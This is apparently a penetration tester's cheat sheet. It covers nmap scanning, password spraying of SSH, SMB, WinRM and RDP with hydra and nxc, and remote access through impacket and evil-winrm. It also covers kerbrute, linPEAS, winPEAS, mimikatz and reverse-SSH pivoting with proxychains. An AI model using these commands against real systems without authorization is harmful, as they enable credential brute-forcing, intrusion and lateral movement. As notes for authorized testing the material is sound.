Guideline

Scanning shit

nmap

To Run
    sudo nmap <IP>/<subnet mask> -o network.nmap
    sudo nmap -sV -sC -sT -T4 -A --top-ports=100 --open <IP> -Pn -o target.commonmap
    sudo nmap -sV -sC -sT -T4 -A -p- --open <IP> -Pn -o target.fullmap

In case of slow scans
    sudo nmap -p- --open <IP> -Pn -o target.fullmap
    sudo nmap -sV -sC -sT -T4 -A -p<> --open <IP> -Pn -o target.<port>map

When not sure about service vulnerability (Look for EDB-ID tags)
    sudo nmap -sV -p<> --script "vuln" <IP> -o target.vulnmap

Refer to Service Enumeration, for respective services

Checking Remote access viability (Require Credentials)

SSH

hydra -l <username> -P <wordlist> -s <port number> ssh://<target ip address>
hydra -L <username list> -P <wordlist> -s <port number> ssh://<target ip address>

To access:
    ssh <username>@<IP>
    ssh -i <private key> <username>@<IP> -o "IdentitiesOnly=yes"

SMB

nxc smb <IP> -d <domain name> -u users.txt -p passwords.txt --continue-on-success
nxc smb <IP> -d <domain name> -u users.txt -H hashes.txt --continue-on-success

To access:
    impacket-smbexec [domain\\]<username>[:password]@<IP>
    impacket-psexec [domain\\]<username>[:password]@<IP>
    impacket-wmiexec [domain\\]<username>[:password]@<IP>

WINRM

nxc winrm <IP> -d <domain name> -u users.txt -p passwords.txt --continue-on-success
nxc winrm <IP> -d <domain name> -u users.txt -H hashes.txt --continue-on-success

To access:
    evil-winrm -i <ip> -u [domain\\]<username> -p <password>
    # You can download files with the download keyword

RDP

nxc rdp <IP> -d <domain name> -u users.txt -p passwords.txt --continue-on-success
nxc rdp <IP> -d <domain name> -u users.txt -H hashes.txt --continue-on-success

To access:
    xfreerdp /d:<domain name> /u:<username> /p:<password> /v:<IP> /kbd:0x0000040a +clipboard /cert:ignore /size:70% +drive:/kali/directory,KALISHARE

• Check Service version

• Check CMS Version

• Check LFI vulnerabilities

• Check SQLi injections

Kerbrute (Checking valid usernames with DC)

wget https://github.com/ropnop/kerbrute && chmod +x kerbrute
./kerbrute userenum users.txt --dc <DC IP> --domain <domain>

Enumeration on inside

Linux

• Run linPEAS.sh

• Refer for manual enumeration: Linux

Windows

• Run winPEASx64.exe or winPEASx32.exe

• Run mimikatz.exe

• Refer for manual enumeration: Windows

Pivoting

• Reverse SSH connection

On Kali Machine:
    sudo systemctl start ssh
    sudo nano /etc/proxychains.conf
    > Append: socks5 127.0.0.1 <Kali Port>

On target Pivot Machine:
    ssh -N -R <Kali Port> kali@<Kali IP>

To verify on Kali Machine:
    ss -ntplu

To use:
    proxychains <command>

• Refer to Port Forwarding and Port Forwarding Extrasfor other methods

  • Consider using Chisel for a Linux pivot

  • Consider using Chisel, or Plink.exe for Windows pivot